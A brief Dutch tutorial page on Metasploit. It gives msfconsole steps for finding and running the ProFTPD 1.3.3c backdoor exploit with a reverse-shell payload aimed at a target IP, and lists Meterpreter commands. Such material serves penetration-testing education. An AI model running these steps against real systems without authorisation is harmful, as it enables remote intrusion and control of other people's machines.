Metasploit
Introductie
Zoeken naar en gebruiken van exploits
Start msfconsole
Zoek naar een exploit voor een bepaald produkt met
search ProFTPD 1.3.3c
Selecteer een geschikte exploit, en stel de opties in, bijvoorbeeld als volgt:
use exploit/unix/ftp/proftpd_133c_backdoor
show options
set rhost target_IP
Vervolgens moet je een payload kiezen, en opnieuw opties instellen:
show payloads
set payload 3 // cmd/unix/reverse
show options
set lhost Kali_IP
Tenslotte voer je de exploit uit met exploit
Meterpreter
Meterpreter
staat voor Meta Interpreter,
Metasploit
's eigen command line interface.
Het is de meest geavanceerde Stage payload, a comprehensive shell
for running services on remote systems.
Commando's
- execute: Voer een commando uit;
- getenv: Vraag waardes van 1 of meer environment variabelen op;
- getuid: Geeft het userid waaronder je actief bent;
- kill: Beëindig een proces;
- pkill: Beëindig een proces via de naam;
- ps: Toon de actieve processen;
- shell: Drop into a system command shell;
- sysinfo: Geeft o.a. info over computernaam en OS;
MSFVenom
Links
- Alja
© Henk Dalmolen
Reageer via E-mail (dalmolen@xs4all.nl)
Deze pagina is voor het laatst gewijzigd op: 15-02-23 15:05:13
Reageer via E-mail (dalmolen@xs4all.nl)
Deze pagina is voor het laatst gewijzigd op: 15-02-23 15:05:13